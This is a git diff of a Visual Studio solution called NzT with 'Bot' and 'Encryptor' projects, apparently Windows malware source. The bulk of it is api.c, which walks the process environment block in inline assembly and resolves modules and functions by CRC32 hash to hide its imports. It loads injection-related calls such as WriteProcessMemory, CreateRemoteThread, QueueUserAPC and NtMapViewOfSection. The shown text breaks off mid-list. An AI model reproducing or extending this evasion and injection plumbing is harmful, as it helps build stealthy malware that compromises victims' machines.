NDEBUG;_CONSOLE;%(PreprocessorDefinitions) + true + + + Console + true + true + true + + + + + + + + + \ No newline at end of file diff --git a/src/Encryptor/Encryptor.vcxproj.filters b/src/Encryptor/Encryptor.vcxproj.filters new file mode 100644 index 0000000..057eae3 --- /dev/null +++ b/src/Encryptor/Encryptor.vcxproj.filters @@ -0,0 +1,22 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;hm;inl;inc;ipp;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + \ No newline at end of file diff --git a/src/Encryptor/Encryptor.vcxproj.user b/src/Encryptor/Encryptor.vcxproj.user new file mode 100644 index 0000000..6e2aec7 --- /dev/null +++ b/src/Encryptor/Encryptor.vcxproj.user @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git a/src/Encryptor/Release/Encryptor.Build.CppClean.log b/src/Encryptor/Release/Encryptor.Build.CppClean.log new file mode 100644 index 0000000..0b15fc1 --- /dev/null +++ b/src/Encryptor/Release/Encryptor.Build.CppClean.log @@ -0,0 +1,8 @@ +c:\users\user\documents\nzt\src\encryptor\release\vc142.pdb +c:\users\user\documents\nzt\src\encryptor\release\encryptor.obj +c:\users\user\documents\nzt\src\encryptor\release\encryptor.tlog\cl.command.1.tlog +c:\users\user\documents\nzt\src\encryptor\release\encryptor.tlog\cl.read.1.tlog +c:\users\user\documents\nzt\src\encryptor\release\encryptor.tlog\cl.write.1.tlog +c:\users\user\documents\nzt\src\encryptor\release\encryptor.tlog\link.command.1.tlog +c:\users\user\documents\nzt\src\encryptor\release\encryptor.tlog\link.read.1.tlog +c:\users\user\documents\nzt\src\encryptor\release\encryptor.tlog\link.write.1.tlog diff --git a/src/Encryptor/Release/Encryptor.log b/src/Encryptor/Release/Encryptor.log new file mode 100644 index 0000000..7eff231 --- /dev/null +++ b/src/Encryptor/Release/Encryptor.log @@ -0,0 +1,8 @@ + Encryptor.c +C:\Users\user\Documents\NzT\src\Shared\crt.c(485,31): warning C4244: '=': conversion from 'DWORD' to 'USHORT', possible loss of data +C:\Users\user\Documents\NzT\src\Shared\crt.c(486,36): warning C4244: '=': conversion from 'DWORD' to 'USHORT', possible loss of data + Generating code + Previous IPDB not found, fall back to full compilation. + All 29 functions were compiled because no usable IPDB/IOBJ from previous compilation was found. + Finished generating code + Encryptor.vcxproj -> C:\Users\user\Documents\NzT\src\Release\Encryptor.exe diff --git a/src/Encryptor/Release/Encryptor.obj b/src/Encryptor/Release/Encryptor.obj new file mode 100644 index 0000000..a9c526f Binary files /dev/null and b/src/Encryptor/Release/Encryptor.obj differ diff --git a/src/Encryptor/Release/Encryptor.tlog/CL.command.1.tlog b/src/Encryptor/Release/Encryptor.tlog/CL.command.1.tlog new file mode 100644 index 0000000..e89aae9 Binary files /dev/null and b/src/Encryptor/Release/Encryptor.tlog/CL.command.1.tlog differ diff --git a/src/Encryptor/Release/Encryptor.tlog/CL.read.1.tlog b/src/Encryptor/Release/Encryptor.tlog/CL.read.1.tlog new file mode 100644 index 0000000..01c7a9d Binary files /dev/null and b/src/Encryptor/Release/Encryptor.tlog/CL.read.1.tlog differ diff --git a/src/Encryptor/Release/Encryptor.tlog/CL.write.1.tlog b/src/Encryptor/Release/Encryptor.tlog/CL.write.1.tlog new file mode 100644 index 0000000..73c9496 Binary files /dev/null and b/src/Encryptor/Release/Encryptor.tlog/CL.write.1.tlog differ diff --git a/src/Encryptor/Release/Encryptor.tlog/Encryptor.lastbuildstate b/src/Encryptor/Release/Encryptor.tlog/Encryptor.lastbuildstate new file mode 100644 index 0000000..44d435a --- /dev/null +++ b/src/Encryptor/Release/Encryptor.tlog/Encryptor.lastbuildstate @@ -0,0 +1,2 @@ +#TargetFrameworkVersion=v4.0:PlatformToolSet=v142:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0 +Release|Win32|C:\Users\user\Documents\NzT\src\| diff --git a/src/Encryptor/Release/Encryptor.tlog/Encryptor.write.1u.tlog b/src/Encryptor/Release/Encryptor.tlog/Encryptor.write.1u.tlog new file mode 100644 index 0000000..c503e01 Binary files /dev/null and b/src/Encryptor/Release/Encryptor.tlog/Encryptor.write.1u.tlog differ diff --git a/src/Encryptor/Release/Encryptor.tlog/link.command.1.tlog b/src/Encryptor/Release/Encryptor.tlog/link.command.1.tlog new file mode 100644 index 0000000..b8faa56 Binary files /dev/null and b/src/Encryptor/Release/Encryptor.tlog/link.command.1.tlog differ diff --git a/src/Encryptor/Release/Encryptor.tlog/link.read.1.tlog b/src/Encryptor/Release/Encryptor.tlog/link.read.1.tlog new file mode 100644 index 0000000..7cfb23f Binary files /dev/null and b/src/Encryptor/Release/Encryptor.tlog/link.read.1.tlog differ diff --git a/src/Encryptor/Release/Encryptor.tlog/link.write.1.tlog b/src/Encryptor/Release/Encryptor.tlog/link.write.1.tlog new file mode 100644 index 0000000..eb9bb7d Binary files /dev/null and b/src/Encryptor/Release/Encryptor.tlog/link.write.1.tlog differ diff --git a/src/Encryptor/Release/Encryptor.vcxproj.FileListAbsolute.txt b/src/Encryptor/Release/Encryptor.vcxproj.FileListAbsolute.txt new file mode 100644 index 0000000..e69de29 diff --git a/src/Encryptor/Release/vc142.pdb b/src/Encryptor/Release/vc142.pdb new file mode 100644 index 0000000..eb63e2a Binary files /dev/null and b/src/Encryptor/Release/vc142.pdb differ diff --git a/src/NzT.sln b/src/NzT.sln new file mode 100644 index 0000000..3b2ef35 --- /dev/null +++ b/src/NzT.sln @@ -0,0 +1,43 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio 15 +VisualStudioVersion = 15.0.28307.1778 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Bot", "Bot\Bot.vcxproj", "{4415A846-1C99-4260-960D-40E141837813}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Encryptor", "Encryptor\Encryptor.vcxproj", "{7931DABA-686D-4B7A-BEF9-DD52F1469367}" +EndProject +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Shared", "Shared\Shared.vcxitems", "{AF96A04D-24AE-4A4D-BF5E-396969DD48D5}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|x64 = Debug|x64 + Debug|x86 = Debug|x86 + Release|x64 = Release|x64 + Release|x86 = Release|x86 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {4415A846-1C99-4260-960D-40E141837813}.Debug|x64.ActiveCfg = Debug|x64 + {4415A846-1C99-4260-960D-40E141837813}.Debug|x64.Build.0 = Debug|x64 + {4415A846-1C99-4260-960D-40E141837813}.Debug|x86.ActiveCfg = Debug|Win32 + {4415A846-1C99-4260-960D-40E141837813}.Debug|x86.Build.0 = Debug|Win32 + {4415A846-1C99-4260-960D-40E141837813}.Release|x64.ActiveCfg = Release|x64 + {4415A846-1C99-4260-960D-40E141837813}.Release|x64.Build.0 = Release|x64 + {4415A846-1C99-4260-960D-40E141837813}.Release|x86.ActiveCfg = Release|Win32 + {4415A846-1C99-4260-960D-40E141837813}.Release|x86.Build.0 = Release|Win32 + {7931DABA-686D-4B7A-BEF9-DD52F1469367}.Debug|x64.ActiveCfg = Debug|x64 + {7931DABA-686D-4B7A-BEF9-DD52F1469367}.Debug|x64.Build.0 = Debug|x64 + {7931DABA-686D-4B7A-BEF9-DD52F1469367}.Debug|x86.ActiveCfg = Debug|Win32 + {7931DABA-686D-4B7A-BEF9-DD52F1469367}.Debug|x86.Build.0 = Debug|Win32 + {7931DABA-686D-4B7A-BEF9-DD52F1469367}.Release|x64.ActiveCfg = Release|x64 + {7931DABA-686D-4B7A-BEF9-DD52F1469367}.Release|x64.Build.0 = Release|x64 + {7931DABA-686D-4B7A-BEF9-DD52F1469367}.Release|x86.ActiveCfg = Release|Win32 + {7931DABA-686D-4B7A-BEF9-DD52F1469367}.Release|x86.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ExtensibilityGlobals) = postSolution + SolutionGuid = {FA4446C5-33AE-4057-924B-275413E3F532} + EndGlobalSection +EndGlobal diff --git a/src/Shared/Shared.vcxitems b/src/Shared/Shared.vcxitems new file mode 100644 index 0000000..547bc5a --- /dev/null +++ b/src/Shared/Shared.vcxitems @@ -0,0 +1,56 @@ + + + + $(MSBuildAllProjects);$(MSBuildThisFileFullPath) + true + {af96a04d-24ae-4a4d-bf5e-396969dd48d5} + + + + %(AdditionalIncludeDirectories);$(MSBuildThisFileDirectory) + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/src/Shared/Shared.vcxitems.filters b/src/Shared/Shared.vcxitems.filters new file mode 100644 index 0000000..a269c7f --- /dev/null +++ b/src/Shared/Shared.vcxitems.filters @@ -0,0 +1,174 @@ + + + + + {cc068487-d631-4e61-9f68-2fa2c1f11322} + + + {f5f6420f-8b4a-4990-be0c-1d342067c5f7} + + + {09d0bf83-00c3-4e18-9b9f-67fc5fb13943} + + + {25223bc2-b036-4a6d-a7b8-195dfdb14eea} + + + {ca2adc11-29d3-4401-b227-5231d7e7d185} + + + {92e8370c-86f4-4b68-b952-e727b6a0dcd7} + + + {52f926e4-cffc-4a0d-bca3-b9bf07d57ddf} + + + {eee9a8a8-a051-4952-9042-c31f94a4bceb} + + + {5b446af7-5f09-4a6e-a5f8-d605212cf980} + + + {dd700a08-7a46-4cc0-b3bf-fc0afecb0c92} + + + {90a6a14c-60d3-4b1c-a00e-548eed34e683} + + + {7fd18cc1-3d1d-4f0e-8c84-8e42f370e27e} + + + {fd0ea3c8-6283-4370-9b9a-e281a72ed3a1} + + + {56903e19-ce18-43f9-914f-effad4538614} + + + {54282a96-01f7-40c5-a819-7bd9ebb9ffcf} + + + {2db74972-0780-4da0-8933-eb857eac7824} + + + {c69bfb8b-417e-402c-8f3e-a9f0924a898c} + + + {7e9fd5c7-48da-4ce1-a2a3-8944c0340585} + + + {fcdfea01-acdf-421f-82e6-e8fc6ad10476} + + + + + Header Files\Config + + + Header Files\Utilities + + + Header Files\Config + + + Header Files\Utilities + + + Header Files\Misc + + + Header Files\API + + + Header Files\API\ntdll + + + Header Files\API\ntdll + + + Header Files\API\user32 + + + Header Files\API\user32 + + + Header Files\API\wininet + + + Header Files\API\wininet + + + Header Files\API\kernel32 + + + Header Files\API\advapi32 + + + Header Files\API\shell32 + + + Header Files\API\shell32 + + + Header Files\API\advapi32 + + + Header Files\API\kernel32 + + + Header Files\Core + + + Header Files\Utilities + + + Header Files\Config + + + Header Files\Utilities + + + Header Files\Utilities + + + Header Files\Core + + + Header Files\Crypto + + + + + Source Files\Utilities + + + Source Files\Utilities + + + Source Files\Utilities + + + Source Files\API + + + Source Files\Core + + + Source Files\Core + + + Source Files\Config + + + Source Files\Utilities + + + Source Files\Utilities + + + Source Files\Core + + + Source Files\Crypto + + + \ No newline at end of file diff --git a/src/Shared/advapi32_functions.h b/src/Shared/advapi32_functions.h new file mode 100644 index 0000000..1f1b594 --- /dev/null +++ b/src/Shared/advapi32_functions.h @@ -0,0 +1,11 @@ +#ifndef __ADVAPI32_FUNCTIONS_H__ +#define __ADVAPI32_FUNCTIONS_H__ + +#include + +typedef BOOL(WINAPI* ptGetUserNameA)( + _Out_writes_to_opt_(*pcbBuffer, *pcbBuffer) LPSTR lpBuffer, + _Inout_ LPDWORD pcbBuffer + ); + +#endif //__ADVAPI32_FUNCTIONS_H__ \ No newline at end of file diff --git a/src/Shared/advapi32_hash.h b/src/Shared/advapi32_hash.h new file mode 100644 index 0000000..3df3803 --- /dev/null +++ b/src/Shared/advapi32_hash.h @@ -0,0 +1,7 @@ +#ifndef __ADVAPI32_HASH_H__ +#define __ADVAPI32_HASH_H__ + +#define HASH_ADVAPI32 0x929b1529 +#define HASH_ADVAPI32_GETUSERNAMEA 0x59761a93 + +#endif //__ADVAPI32_HASH_H__ \ No newline at end of file diff --git a/src/Shared/api.c b/src/Shared/api.c new file mode 100644 index 0000000..aec89fd --- /dev/null +++ b/src/Shared/api.c @@ -0,0 +1,358 @@ +#ifdef _DEBUG +#include +#endif + +#include "api.h" +#include "utils.h" +#include "nzt.h" +#include "ntdll.h" + +//implement heavens gate to handle x86<->x64 dynamic function resolving +HMODULE GetModuleHandleByHash(DWORD Hash) +{ + LDR_MODULE* Module = NULL; + DWORD CurrentHash; + DWORD Length; + + _asm + { + MOV EAX, FS:[0x18]; + MOV EAX, [EAX + 0x30]; + MOV EAX, [EAX + 0x0C]; + MOV EAX, [EAX + 0x0C]; + MOV Module, EAX; + } + + while (Module->BaseAddress) + { + LPWSTR LowerCase = StringToLowerW(Module->BaseDllName.Buffer, Module->BaseDllName.Length); + + Length = StringLengthW(LowerCase) * 2; + CurrentHash = Crc32Hash(LowerCase, Length); + + if (CurrentHash == Hash) + { + return (HMODULE)Module->BaseAddress; + } + + Module = (PLDR_MODULE)(struct ModuleInfoNode*)Module->InLoadOrderModuleList.Flink; + } + + return (HMODULE)NULL; +} + +BOOL GetModules() +{ + DWORD i; + + API_MODULE ModuleList[] = + { + {HASH_KERNEL32, &NzT.Modules.Kernel32} + }; + + for (i = 0; i < sizeof(ModuleList) / sizeof(API_MODULE); i++) + { + if ((*ModuleList[i].Module = GetModuleHandleByHash(ModuleList[i].ModuleHash)) == 0) + { + return FALSE; + } + } + + return TRUE; +} + +BOOL LoadNtdllModule() +{ + API_MODULE ModuleList[] = + { + {HASH_NTDLL, &NzT.Modules.Ntdll} + }; + + for (DWORD i = 0; i < sizeof(ModuleList) / sizeof(API_MODULE); i++) + { + if ((*ModuleList[i].Module = GetModuleHandleByHash(ModuleList[i].ModuleHash)) == 0) + { + return FALSE; + } + } + + return TRUE; +} + +BOOL LoadNtdll() +{ + API_T ApiList[] = + { + {HASH_NTDLL_RTLGETVERSION, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pRtlGetVersion}, + {HASH_NTDLL_NTCREATETHREAD, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pNtCreateThread}, + {HASH_NTDLL_NTQUERYINFORMATIONPROCESS, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pNtQueryInformationProcess}, + {HASH_NTDLL_NTQUERYINFORMATIONTHREAD, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pNtQueryInformationThread}, + {HASH_NTDLL_NTCREATEUSERPROCESS, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pNtCreateUserProcess}, + {HASH_NTDLL_NTMAPVIEWOFSECTION, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pNtMapViewOfSection}, + {HASH_NTDLL_NTCREATESECTION, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pNtCreateSection}, + {HASH_NTDLL_LDRLOADDLL, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pLdrLoadDll}, + {HASH_NTDLL_LDRGETDLLHANDLE, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pLdrGetDllHandle}, + {HASH_NTDLL_NTWRITEVIRTUALMEMORY, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pNtWriteVirtualMemory}, + {HASH_NTDLL_NTALLOCATEVIRTUALMEMORY, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pNtAllocateVirtualMemory}, + {HASH_NTDLL_NTPROTECTVIRTUALMEMORY, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pNtProtectVirtualMemory}, + {HASH_NTDLL_NTDEVICEIOCONTROLFILE, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pNtDeviceIoControlFile}, + {HASH_NTDLL_NTSETCONTEXTTHREAD, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pNtSetContextThread}, + {HASH_NTDLL_NTOPENPROCESS, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pNtOpenProcess}, + {HASH_NTDLL_NTCLOSE, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pNtClose}, + {HASH_NTDLL_NTCREATEFILE, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pNtCreateFile}, + {HASH_NTDLL_NTOPENFILE, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pNtOpenFile}, + {HASH_NTDLL_NTDELETEFILE, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pNtDeleteFile}, + {HASH_NTDLL_NTREADVIRTUALMEMORY, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pNtReadVirtualMemory}, + {HASH_NTDLL_NTQUERYVIRTUALMEMORY, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pNtQueryVirtualMemory}, + {HASH_NTDLL_NTOPENTHREAD, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pNtOpenThread}, + {HASH_NTDLL_NTRESUMETHREAD, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pNtResumeThread}, + {HASH_NTDLL_NTFREEVIRTUALMEMORY, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pNtFreeVirtualMemory}, + {HASH_NTDLL_NTFLUSHINSTRUCTIONCACHE, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pNtFlushInstructionCache}, + {HASH_NTDLL_RTLRANDOMEX, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pRtlRandomEx}, + {HASH_NTDLL_NTQUERYSYSTEMINFORMATION, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pNtQuerySystemInformation}, + {HASH_NTDLL_LDRQUERYPROCESSMODULEINFORMATION, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pLdrQueryProcessModuleInformation}, + {HASH_NTDLL_RTLINITUNICODESTRING, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pRtlInitUnicodeString}, + {HASH_NTDLL_NTWRITEFILE, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pNtWriteFile}, + {HASH_NTDLL_NTREADFILE, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pNtReadFile}, + {HASH_NTDLL_NTDELAYEXECUTION, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pNtDelayExecution}, + {HASH_NTDLL_NTOPENKEY, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pNtOpenKey}, + {HASH_NTDLL_NTSETVALUEKEY, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pNtSetValueKey}, + {HASH_NTDLL_NTQUERYVALUEKEY, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pNtQueryValueKey}, + {HASH_NTDLL_RTLFORMATCURRENTUSERKEYPATH, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pRtlFormatCurrentUserKeyPath}, + {HASH_NTDLL_NTQUERYINFORMATIONFILE, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pNtQueryInformationFile} + }; + + for (DWORD i = 0; i < sizeof(ApiList) / sizeof(API_T); i++) + { + *ApiList[i].Function = GetProcAddressByHash(*ApiList[i].Module, ApiList[i].FunctionHash); + } + + return TRUE; +} + + +HMODULE LoadLibraryByHash(DWORD Hash){ + LPWSTR SystemDirectory; + WIN32_FIND_DATAW Data; + HANDLE File; + DWORD CurrentHash; + HMODULE Module; + + if ((SystemDirectory = GetSystem32()) == NULL) + return 0; + + if (!StringConcatW(&SystemDirectory, L"\\*.dll")) + return 0; + + Module = 0; + + MemoryZero(&Data, sizeof(WIN32_FIND_DATAW)); + + if ((File = API(FindFirstFileW(SystemDirectory, &Data))) != INVALID_HANDLE_VALUE) + { + while (TRUE) + { + if (!API(FindNextFileW(File, &Data))) + break; + + if (File == INVALID_HANDLE_VALUE) + break; + + CurrentHash = Crc32Hash(Data.cFileName, StringLengthW(Data.cFileName) * 2); + + if (CurrentHash == Hash) + { + Module = API(LoadLibraryW(Data.cFileName)); + break; + } + } + } + + Free(SystemDirectory); + return Module; +} + +LPVOID GetProcAddressByHash( + HMODULE Module, + DWORD Hash +) +{ +#if defined _WIN64 + PIMAGE_NT_HEADERS64 NtHeaders; +#else + PIMAGE_NT_HEADERS32 NtHeaders; +#endif + + PIMAGE_DATA_DIRECTORY DataDirectory; + PIMAGE_EXPORT_DIRECTORY ExportDirectory; + + LPDWORD Name; + DWORD i, CurrentHash; + LPSTR Function; + LPWORD pw; + + if (Module == NULL) + return NULL; + +#if defined _WIN64 + NtHeaders = (PIMAGE_NT_HEADERS64)((LPBYTE)Module + ((PIMAGE_DOS_HEADER)Module)->e_lfanew); +#else + NtHeaders = (PIMAGE_NT_HEADERS32)((LPBYTE)Module + ((PIMAGE_DOS_HEADER)Module)->e_lfanew); +#endif + + DataDirectory = &NtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; + ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((LPBYTE)Module + DataDirectory->VirtualAddress); + + for (i = 0; i < ExportDirectory->NumberOfNames; i++) + { + Name = (LPDWORD)(((LPBYTE)Module) + ExportDirectory->AddressOfNames + i * sizeof(DWORD)); + Function = (LPSTR)((LPBYTE)Module + *Name); + + CurrentHash = Crc32Hash(Function, StringLengthA(Function)); + + if (Name && Function && CurrentHash == Hash) + { + pw = (LPWORD)(((LPBYTE)Module) + ExportDirectory->AddressOfNameOrdinals + i * sizeof(WORD)); + Name = (LPDWORD)(((LPBYTE)Module) + ExportDirectory->AddressOfFunctions + (*pw) * sizeof(DWORD)); + return ((LPBYTE)Module + *Name); + } + } + + return NULL; +} + +BOOL LoadModules() +{ + API_MODULE ModuleList[] = + { + {HASH_USER32, &NzT.Modules.User32}, + {HASH_WININET, &NzT.Modules.Wininet}, + {HASH_SHELL32, &NzT.Modules.Shell32}, + {HASH_ADVAPI32, &NzT.Modules.Advapi32} + }; + + for (DWORD i = 0; i < sizeof(ModuleList) / sizeof(API_MODULE); i++) + { + if ((*ModuleList[i].Module = LoadLibraryByHash(ModuleList[i].ModuleHash)) == 0) + return FALSE; + } + + return TRUE; +} + +BOOL LoadKernel32() +{ + API_T ApiList[] = + { + { HASH_KERNEL32_VIRTUALALLOC, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pVirtualAlloc }, + {HASH_KERNEL32_VIRTUALFREE, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pVirtualFree }, + {HASH_KERNEL32_WRITEPROCESSMEMORY, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pWriteProcessMemory }, + {HASH_KERNEL32_CREATETOOLHELP32SNAPSHOT, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pCreateToolhelp32Snapshot }, + {HASH_KERNEL32_VIRTUALALLOCEX, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pVirtualAllocEx }, + {HASH_KERNEL32_VIRTUALFREEEX, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pVirtualFreeEx }, + {HASH_KERNEL32_PROCESS32FIRSTW, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pProcess32FirstW }, + {HASH_KERNEL32_PROCESS32NEXTW, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pProcess32NextW }, + {HASH_KERNEL32_CLOSEHANDLE, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pCloseHandle }, + {HASH_KERNEL32_CREATEPROCESSW, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pCreateProcessW }, + {HASH_KERNEL32_VIRTUALPROTECT, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pVirtualProtect }, + {HASH_KERNEL32_OPENPROCESS, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pOpenProcess }, + {HASH_KERNEL32_CREATEREMOTETHREAD, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pCreateRemoteThread }, + {HASH_KERNEL32_EXITPROCESS, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pExitProcess }, + {HASH_KERNEL32_GETMODULEFILENAMEW, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pGetModuleFileNameW }, + {HASH_KERNEL32_DELETEFILEW, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pDeleteFileW }, + {HASH_KERNEL32_LOADLIBRARYW, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pLoadLibraryW }, + {HASH_KERNEL32_ISWOW64PROCESS, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pIsWow64Process }, + {HASH_KERNEL32_GETWINDOWSDIRECTORYW, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pGetWindowsDirectoryW }, + {HASH_KERNEL32_QUEUEUSERAPC, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pQueueUserAPC }, + {HASH_KERNEL32_RESUMETHREAD, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pResumeThread }, + {HASH_KERNEL32_GETSYSTEMDIRECTORYW, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pGetSystemDirectoryW }, + {HASH_KERNEL32_FINDFIRSTFILEW, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pFindFirstFileW }, + {HASH_KERNEL32_FINDNEXTFILEW, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pFindNextFileW }, + {HASH_KERNEL32_CREATETHREAD, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pCreateThread}, + {HASH_KERNEL32_CREATEFILEW, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pCreateFileW}, + {HASH_KERNEL32_WRITEFILE, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pWriteFile}, + {HASH_KERNEL32_READFILE, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pReadFile}, + {HASH_KERNEL32_GETFILESIZE, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pGetFileSize}, + {HASH_KERNEL32_GETVERSIONEXW, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pGetVersionExW}, + {HASH_KERNEL32_FINDFIRSTVOLUMEW, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pFindFirstVolumeW}, + {HASH_KERNEL32_GETVOLUMEINFORMATIONW, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pGetVolumeInformationW}, + {HASH_KERNEL32_FINDVOLUMECLOSE, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pFindVolumeClose}, + {HASH_KERNEL32_MULTIBYTETOWIDECHAR, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pMultiByteToWideChar}, + {HASH_KERNEL32_GETMODULEHANDLEW, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pGetModuleHandleW}, + {HASH_KERNEL32_FLUSHINSTRUCTIONCACHE, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pFlushInstructionCache}, + {HASH_KERNEL32_GETCURRENTPROCESS, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pGetCurrentProcess}, + {HASH_KERNEL32_THREAD32FIRST, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pThread32First}, + {HASH_KERNEL32_THREAD32NEXT, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pThread32Next}, + {HASH_KERNEL32_OPENMUTEXW, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pOpenMutexW}, + {HASH_KERNEL32_CREATEMUTEXW, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pCreateMutexW}, + {HASH_KERNEL32_VIRTUALQUERY, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pVirtualQuery}, + {HASH_KERNEL32_GETCURRENTPROCESSID, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pGetCurrentProcessId}, + {HASH_KERNEL32_CREATEFILEMAPPINGW, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pCreateFileMappingW}, + {HASH_KERNEL32_MAPVIEWOFFILE, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pMapViewOfFile}, + {HASH_KERNEL32_UNMAPVIEWOFFILE, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pUnmapViewOfFile}, + {HASH_KERNEL32_DUPLICATEHANDLE, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pDuplicateHandle}, + {HASH_KERNEL32_GETCURRENTTHREAD, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pGetCurrentThread}, + {HASH_KERNEL32_FLUSHFILEBUFFERS, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pFlushFileBuffers}, + {HASH_KERNEL32_DISCONNECTNAMEDPIPE, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pDisconnectNamedPipe}, + {HASH_KERNEL32_GETPROCADDRESS, &NzT.Modules.Kernel32, (LPVOID*)&NzT.Api.pGetProcAddress}, + {HASH_KERNEL32_RTLINITIALIZECRITICALSECTION, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pRtlInitializeCriticalSection}, + {HASH_KERNEL32_RTLENTERCRITICALSECTION, &NzT.Modules.Ntdll, (LPVOID*)&NzT.Api.pRtlEnterCriticalSection}, + 